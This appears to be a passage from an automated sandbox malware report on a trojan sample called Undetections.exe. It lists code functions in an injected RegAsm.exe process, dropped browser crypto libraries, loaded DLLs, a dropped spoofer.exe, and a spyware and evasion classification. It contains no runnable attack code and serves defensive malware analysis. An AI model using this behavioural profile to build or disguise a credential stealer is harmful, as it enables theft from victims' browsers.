                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D282204_2_69D28220
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D1A5E04_2_69D1A5E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CDE5F04_2_69CDE5F0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C445B04_2_69C445B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D985504_2_69D98550
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CA85404_2_69CA8540
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D545404_2_69D54540
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CB25604_2_69CB2560
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CF05704_2_69CF0570
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C964D04_2_69C964D0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CEA4D04_2_69CEA4D0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D7A4804_2_69D7A480
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C684604_2_69C68460
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CB44204_2_69CB4420
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CDA4304_2_69CDA430
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C7A7D04_2_69C7A7D0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CD07004_2_69CD0700
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C746D04_2_69C746D0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CAE6E04_2_69CAE6E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CEE6E04_2_69CEE6E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CAC6504_2_69CAC650
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CE99C04_2_69CE99C0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C899D04_2_69C899D0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CB59F04_2_69CB59F0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CE79F04_2_69CE79F0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D219904_2_69D21990
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C619804_2_69C61980
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CCF9604_2_69CCF960
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D0D9604_2_69D0D960
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D9F9004_2_69D9F900
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D059204_2_69D05920
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D2F8F04_2_69D2F8F0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C5D8E04_2_69C5D8E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C838E04_2_69C838E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69DAB8F04_2_69DAB8F0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CAD8104_2_69CAD810
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C97BF04_2_69C97BF0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D35B904_2_69D35B90
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C41B804_2_69C41B80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D19BB04_2_69D19BB0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CA9BA04_2_69CA9BA0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D2FB604_2_69D2FB60
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C9BB204_2_69C9BB20
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C51AE04_2_69C51AE0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D2DAB04_2_69D2DAB0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69DD9A504_2_69DD9A50
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C8FA104_2_69C8FA10
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D4DA304_2_69D4DA30
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D21DC04_2_69D21DC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C43D804_2_69C43D80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D99D904_2_69D99D90
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CB3D004_2_69CB3D00
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D8DCD04_2_69D8DCD0
                          Source: Joe Sandbox ViewDropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                          Source: Joe Sandbox ViewDropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004022A0 appears 286 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 69C73620 appears 76 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 69D89F30 appears 49 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 69C79B10 appears 78 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 69CAC5E0 appears 34 times
                          Source: Undetections.exe, 00000000.00000002.4105841921.0000000005500000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs Undetections.exe
                          Source: Undetections.exe, 00000000.00000002.4082954500.00000000029FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs Undetections.exe
                          Source: Undetections.exe, 00000000.00000002.4082954500.00000000029FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFontAwesome.Sharp.dllD vs Undetections.exe
                          Source: Undetections.exe, 00000000.00000002.4082392228.0000000000D9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Undetections.exe
                          Source: Undetections.exe, 00000000.00000002.4100226337.0000000003941000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFontAwesome.Sharp.dllD vs Undetections.exe
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002C88000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBeyound.exeF vs Undetections.exe
                          Source: Undetections.exe, 00000000.00000002.4107042182.0000000005BF0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameFontAwesome.Sharp.dllD vs Undetections.exe
                          Source: Undetections.exe, 00000000.00000002.4082954500.00000000029CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs Undetections.exe
                          Source: Undetections.exe, 00000000.00000002.4100226337.0000000003A61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFontAwesome.Sharp.dllD vs Undetections.exe
                          Source: Undetections.exe, 00000000.00000002.4104859280.0000000005390000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSiticone.UI.dll8 vs Undetections.exe
                          Source: Undetections.exe, 00000000.00000002.4082954500.0000000002941000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSiticone.UI.dll8 vs Undetections.exe
                          Source: Undetections.exe, 00000000.00000002.4082392228.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs Undetections.exe
                          Source: Undetections.exe, 00000000.00000002.4100226337.0000000003E21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSiticone.UI.dll8 vs Undetections.exe
                          Source: Undetections.exe, 00000000.00000002.4100226337.0000000003B97000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSiticone.UI.dll8 vs Undetections.exe
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: dwrite.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: msvcp140_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: Undetections.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          Source: spoofer.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/28@4/4
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CB0300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,4_2_69CB0300
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00410980 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle,4_2_00410980
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004110C0 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,VariantClear,4_2_004110C0
                          Source: C:\Users\user\Desktop\Undetections.exeFile created: C:\Users\user\AppData\Roaming\spoofer.zipJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7600:120:WilError_03
                          Source: Undetections.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: Undetections.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                          Source: C:\Users\user\Desktop\Undetections.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: softokn3[1].dll.4.dr, softokn3.dll.4.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                          Source: RegAsm.exe, 00000004.00000002.2139779376.0000000013747000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2155852883.0000000069DDF000.00000002.00000001.01000000.00000011.sdmp, RegAsm.exe, 00000004.00000002.2152326943.00000000196B8000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.4.dr, nss3.dll.4.dr, sqln[1].dll.4.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                          Source: softokn3[1].dll.4.dr, softokn3.dll.4.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                          Source: RegAsm.exe, 00000004.00000002.2139779376.0000000013747000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2155852883.0000000069DDF000.00000002.00000001.01000000.00000011.sdmp, RegAsm.exe, 00000004.00000002.2152326943.00000000196B8000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.4.dr, nss3.dll.4.dr, sqln[1].dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                          Source: RegAsm.exe, 00000004.00000002.2139779376.0000000013747000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2155852883.0000000069DDF000.00000002.00000001.01000000.00000011.sdmp, RegAsm.exe, 00000004.00000002.2152326943.00000000196B8000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.4.dr, nss3.dll.4.dr, sqln[1].dll.4.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                          Source: RegAsm.exe, 00000004.00000002.2139779376.0000000013747000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2155852883.0000000069DDF000.00000002.00000001.01000000.00000011.sdmp, RegAsm.exe, 00000004.00000002.2152326943.00000000196B8000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.4.dr, nss3.dll.4.dr, sqln[1].dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                          Source: softokn3[1].dll.4.dr, softokn3.dll.4.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                          Source: RegAsm.exe, 00000004.00000002.2139779376.0000000013747000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2152326943.00000000196B8000.00000002.00001000.00020000.00000000.sdmp, sqln[1].dll.4.drBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                          Source: softokn3[1].dll.4.dr, softokn3.dll.4.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                          Source: softokn3[1].dll.4.dr, softokn3.dll.4.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                          Source: softokn3[1].dll.4.dr, softokn3.dll.4.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                          Source: RegAsm.exe, 00000004.00000002.2139779376.0000000013747000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2152326943.00000000196B8000.00000002.00001000.00020000.00000000.sdmp, sqln[1].dll.4.drBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                          Source: softokn3[1].dll.4.dr, softokn3.dll.4.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                          Source: RegAsm.exe, RegAsm.exe, 00000004.00000002.2139779376.0000000013747000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2155852883.0000000069DDF000.00000002.00000001.01000000.00000011.sdmp, RegAsm.exe, 00000004.00000002.2152326943.00000000196B8000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.4.dr, nss3.dll.4.dr, sqln[1].dll.4.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                          Source: RegAsm.exe, 00000004.00000002.2139779376.0000000013747000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2155852883.0000000069DDF000.00000002.00000001.01000000.00000011.sdmp, RegAsm.exe, 00000004.00000002.2152326943.00000000196B8000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.4.dr, nss3.dll.4.dr, sqln[1].dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                          Source: softokn3[1].dll.4.dr, softokn3.dll.4.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
